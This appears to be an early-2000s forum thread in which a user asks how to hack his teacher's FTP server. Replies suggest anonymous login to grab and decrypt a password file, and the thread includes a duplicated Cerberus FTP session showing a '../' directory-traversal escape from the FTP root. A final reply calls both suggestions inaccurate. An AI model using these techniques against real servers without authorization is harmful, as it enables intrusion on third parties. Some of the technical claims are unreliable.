ftp server
Results 1 to 5 of 5

Thread: ftp server

  1. #1
    Member
    Join Date
    Sep 2001
    Posts
    43

    Post ftp server

    is it possible to hack into a ftp server??

    I want to hack a site from my teacher, but the only way I can think off is a program that tries out alot off words (with a dictionary)
    This will not work, but does anyone know a better way?





    greetz T
    GOD invented evolution \'cause he couldn\'t do it all by himself.
    Share on Google+

  2. #2
    And why do you wanna hack the FTP server?
    Check for user:Anonymous Pass:Anonymous
    And if you can get on, download the password file
    Then decrypt it
    Share on Google+

  3. #3
    Junior Member
    Join Date
    Sep 2001
    Posts
    17
    Most FTP Servers are multithreaded supporting the RFC 959 protocol completely. A security vulnerability in these products allows attackers to traverse outside the normal bounding FTP root directory and read arbitrary files on the system.

    Example:
    220-Welcome to Cerberus FTP Server
    220 Created by Grant Averett
    Benutzer (192.168.0.2none)): anonymous
    230 User anonymous logged in
    ftp> ls
    200 Port command received
    150 Opening data connection
    delphiown
    226 Transfer complete
    FTP: 11 Bytes empfangen in 0,00Sekunden 11000,00KB/s
    ftp> cd delphiown/../../
    250 Change directory ok
    ftp> ls
    200 Port command received
    150 Opening data connection

    As you can see, you need at least one valid directory, to break out of the ftp root-dir.

    chris@zxtech.net
    www.zxtech.net
    ZXtech Unix Hosting
    Share on Google+

  4. #4
    Junior Member
    Join Date
    Sep 2001
    Posts
    17
    Most FTP Servers are multithreaded supporting the RFC 959 protocol completely. A security vulnerability in these products allows attackers to traverse outside the normal bounding FTP root directory and read arbitrary files on the system.

    Example:
    220-Welcome to Cerberus FTP Server
    220 Created by Grant Averett
    Benutzer (192.168.0.2none)): anonymous
    230 User anonymous logged in
    ftp> ls
    200 Port command received
    150 Opening data connection
    delphiown
    226 Transfer complete
    FTP: 11 Bytes empfangen in 0,00Sekunden 11000,00KB/s
    ftp> cd delphiown/../../
    250 Change directory ok
    ftp> ls
    200 Port command received
    150 Opening data connection

    As you can see, you need at least one valid directory, to break out of the ftp root-dir.

    chris@zxtech.net
    www.zxtech.net
    ZXtech Unix Hosting
    Share on Google+

  5. #5
    First off.. limp.. What the hell are you talking about? Anonymous access, at least on a UNIX machine will NOT devulge a passwd file. ftproot is setup to have it's own directory structure so that anonymous users cannot traverse outside of the daemon's root unless a user is logged in witha valid username and password.

    ..next..

    What do you mean since it's multithreaded that you can leave document root? Hello. That's lame. Just because it's multi threaded doesn't meant that it can leave root. Multithreaded means that it can handle more than one connection (or process) at the same time. This has nothing to do witha poorly written FTP server not doign bounds checking on an anonymous connection to see if it is leaving root.
    And, if a vlid username and password is given, it is SUPPOSED to leave ftp root, as a matter of fact, it's supposed to dump you in your home directory. As least on most UNIX setups.
    Jason Parker - http://www.o-negative.net
    o-Negative: Information Network
    Share on Google+

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

 Security News

     Patches

       Security Trends

         How-To

           Buying Guides